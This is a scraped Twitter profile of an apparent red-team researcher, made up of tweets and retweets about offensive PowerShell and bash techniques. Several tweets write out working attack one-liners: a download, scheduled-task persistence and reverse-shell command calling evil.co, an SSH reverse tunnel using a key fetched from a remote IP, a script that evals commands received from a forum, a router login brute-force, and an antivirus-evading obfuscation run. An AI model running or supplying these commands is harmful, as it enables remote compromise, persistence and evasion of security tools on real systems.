tokyoneon (@tokyoneon_) 's Twitter Profile
tokyoneon

@tokyoneon_

Red Team | Offensive Security

ID: 944119787965288448

linkhttps://tokyoneon.github.io/ calendar_today22-12-2017 08:17:53

57 Tweet

2,2K Takipçi

27 Takip Edilen

tokyoneon (@tokyoneon_) 's Twitter Profile Photo

./patator.py http_fuzz raw_request=/tmp/router_request.txt -x ignore:code=401 accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300 # null-byte.wonderhowto.com/how-to/break-i…

tokyoneon (@tokyoneon_) 's Twitter Profile Photo

powershell -ep bypass "& mkdir $env:public\Windows;iwr evil.co/p -O $env:public\Windows\p.ps1;schtasks /create /f /tn b /tr 'powershell /C ipmo $env:public\Windows\p.ps1;pcat -c evil.co -p 1 -e powershell' /sc onidle /i 1;" nulb.app/z4lxx

tokyoneon (@tokyoneon_) 's Twitter Profile Photo

inboxStatus="$(awk -v FS="(\" style=\"font-weight: bold;\">|</a></div> </div> <\!)" '{print $2}' <<< $inboxCheck)";decCommand="$(base64 -D <<< $encCommand)";response="$(eval $decCommand 2>&1 | base64 | tr -d '\n')"; # null-byte.com/turn-forums-in…

tokyoneon (@tokyoneon_) 's Twitter Profile Photo

C:\> powershell.exe /w 1 /ep bypass /C iwr 11.22.33.44/key -OutFile \$env:temp\key;ssh -N -i \$env:temp\key -R 9999:192.168.1.1:80 -o StrictHostKeyChecking=no [email protected] -p 22 # null-byte.wonderhowto.com/how-to/hacking…

tokyoneon (@tokyoneon_) 's Twitter Profile Photo

./chimera --level 2 --all --typedata cmd.exe --comments /tmp/harry_potter.txt --string getstream --backticks new-object -f shells/generic1.ps1 -o /tmp/chimera.ps1 # github.com/tokyoneon/Chim…

Varonis (@varonis) 's Twitter Profile Photo

🤖tokyoneon walks through a privilege escalation method where attackers leverage built-in PowerShell features to execute arbitrary commands in an elevated (Administrator) context. Read: hubs.ly/H0DW34J0 #infosecurity #redteam #Powershell #cybersecurity

☣ KitPloit - Hacker Tools (@kitploit) 's Twitter Profile Photo

Chimera - A (Shiny And Very Hack-Ish) PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions ift.tt/3bgxqoz

Varonis (@varonis) 's Twitter Profile Photo

🤖Reverse proxies allow adversaries to pivot attacks into secured environments. tokyoneon walks through How APTs Use Reverse Proxies to Nmap Internal Networks hubs.ly/H0Jxwvj0 #reverseproxy #threathunting #pentesting #infosec

Black Hills Information Security (@bhinfosecurity) 's Twitter Profile Photo

BHIS | Tester's Blog How to Phish for User Passwords with PowerShell by: tokyoneon Published: 7/27/2021 Learn More: blackhillsinfosec.com/how-to-phish-f…